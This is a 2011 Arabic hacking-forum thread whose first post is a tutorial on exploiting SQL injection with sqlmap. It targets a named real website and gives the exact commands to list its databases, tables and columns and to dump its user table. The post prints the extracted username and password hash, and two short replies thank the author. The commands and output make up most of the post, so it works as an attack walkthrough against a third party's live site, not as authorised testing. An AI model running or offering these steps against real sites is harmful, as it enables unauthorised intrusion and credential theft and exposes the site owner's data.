التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 10-29-2011, 07:46 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية V!RùS_MàN
 

 

 
إحصائية العضو







V!RùS_MàN غير متواجد حالياً

إرسال رسالة عبر MSN إلى V!RùS_MàN إرسال رسالة عبر Yahoo إلى V!RùS_MàN إرسال رسالة عبر Skype إلى V!RùS_MàN

 

 

إحصائية الترشيح

عدد النقاط : 10
V!RùS_MàN is on a distinguished road

................ استغال ثغرات sql في الباك تراك


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك

اسم الأداة :sqlmap

مسار الاداة : /pentest/database/sqlmap

لغة البرمجة : python

الأن كيفية استخدام الاداة في عملية الحقن

اولا : استخراج اسماء قواعد البيانات

لنقل ان هذا الموقع مصاب بثغرة sql

كود:
http://www.bcspeakers.com/page.php?id=22

وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع

كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs


النتيجة

كود:
available databases [2]:[*] information_schema[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هى
"www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل


كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي


كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي

كود:
+----------+---------------------------+
| Column   | Type                      |
+----------+---------------------------+
| id_user  | int(10) unsigned zerofill |
| password | text                      |
| username | text                      |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي

كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة

كود:
+--------------+
| username     |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد


كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump

سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة

كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي


كود:
+----------------------------------+
| password                         |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+

كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
والسلام عليكم ورحمة الله وبركاته




hsjyhg eyvhj sql td hgfh; jvh;

التوقيع



http://www7.0zz0.com/2010/07/30/13/339242728.png

هــــكـــــر مــحــــتـــرـــف


vbkawarit@vbspiders.com

 

   

رد مع اقتباس
قديم 11-09-2011, 08:11 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

افتراضي رد: استغال ثغرات sql في الباك تراك


مشكور اخوي

بصراحه شرح مميز مع انو خبرتي في الباك تراك والينكس ضعيفه

يعني خبرتي في اي نظام اخر غير الاكس بي والفيستا والسبعه مو قد كذا

بس شفت موضوعك بصراحه ممتاز وان شاء الله يستفيدو منك الكبار في هذا النظام

تحياتي لك وتقبل مروري

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
قديم 11-09-2011, 08:17 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية hacker-7rb
 

 

 
إحصائية العضو






hacker-7rb غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hacker-7rb is on a distinguished road

افتراضي رد: استغال ثغرات sql في الباك تراك


مشكوؤورِّ ..

=>

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:09 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0